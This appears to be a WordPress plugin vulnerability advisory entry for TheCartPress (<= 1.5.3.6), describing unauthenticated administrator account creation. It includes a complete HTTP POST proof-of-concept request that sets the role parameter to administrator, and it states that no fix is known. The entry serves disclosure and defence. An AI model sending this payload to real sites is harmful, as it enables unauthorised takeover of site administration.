TheCartPress eCommerce Shopping Cart <= 1.5.3.6 – Unauthenticated Arbitrary Admin Account Creation | Plugin Vulnerabilities

Description

The tcp_register_and_login_ajax AJAX action of the plugin allows unauthenticated users to create accounts with an arbitrary role such as admin

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 189

action=tcp_register_and_login_ajax&tcp_new_user_name=admin-attacker&tcp_new_user_pass=Passw0rd&tcp_repeat_user_pass=Passw0rd&tcp_new_user_email=attacker@localhost.org&tcp_role=administrator

Affects Plugins

No known fix

References

Exploitdb

Classification

Type

ACCESS CONTROLS

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

spacehen

Verified

Yes

WPVDB ID

9b403259-0c84-4566-becd-eb531c486c21

Timeline

Publicly Published

2021-10-05 (about 4 years ago)

Added

2021-10-05 (about 4 years ago)

Last Updated

2022-04-15 (about 4 years ago)

Other

Published

Title

Published

2021-03-16

Title

wpDataTables < 3.4.2 - Improper Access Control leading to Table Data Deletion

Published

2021-05-26

Title

Simple 301 Redirects by BetterLinks - 2.0.0 – 2.0.3 - Unauthenticated Redirect Import

Published

2021-12-06

Title

Tab - Accordion, FAQ < 1.3.2 - Unauthenticated AJAX Calls

Published

2021-02-10

Title

Map Block for Google Maps < 1.32 - Unauthorised Google API Key change

Published

2021-01-28

Title

uListing < 1.7 - Missing Access Controls